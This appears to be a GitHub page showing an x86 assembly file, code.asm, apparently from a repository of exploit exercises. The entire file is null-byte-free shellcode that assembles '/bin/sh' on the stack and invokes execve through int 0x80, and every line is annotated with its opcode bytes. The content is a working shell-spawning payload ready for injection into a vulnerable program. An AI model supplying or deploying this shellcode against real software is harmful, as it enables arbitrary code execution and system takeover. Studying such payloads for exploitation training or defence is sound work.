-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathcode.asm
28 lines (21 loc) · 989 Bytes
/
code.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
push 16 # 6a 10
nop # 90
pop ecx # 59 => $ecx = 16
xor eax, eax # 31 c0 => $eax = 0x00000000
mov al, 0x68 # b0 68 => $eax = 0x00000068
shl eax, ecx # d3 e0 => $eax = 0x00680000
mov ah, 0x73 # b4 73 => $eax = 0x00687300
mov al, 0x2f # b0 2f => $eax = 0x0068732f ("/sh\0")
mov bh, 0x6e # b7 6e => $ebx = 0x____6e__
mov bl, 0x69 # b3 69 => $ebx = 0x____6e69
shl ebx, ecx # d3 e3 => $ebx = 0x6e690000
mov bh, 0x62 # b7 62 => $ebx = 0x6e696200
mov bl, 0x2f # b3 2f => $ebx = 0x6e69622f ("/bin")
push eax # 50 => Push "/sh\0"
push ebx # 53 => Push "/bin"
xor ecx, ecx # 31 c9 => $ecx = 0
xor edx, edx # 31 d2 => $edx = 0
xor eax, eax # 31 c0 => $eax = 0
mov al, 0x0b # b0 0b => $eax = 0x0b
mov ebx, esp # 89 e3 => $ebx = *"/bin/sh\0"
int 0x80 # cd 80 => execve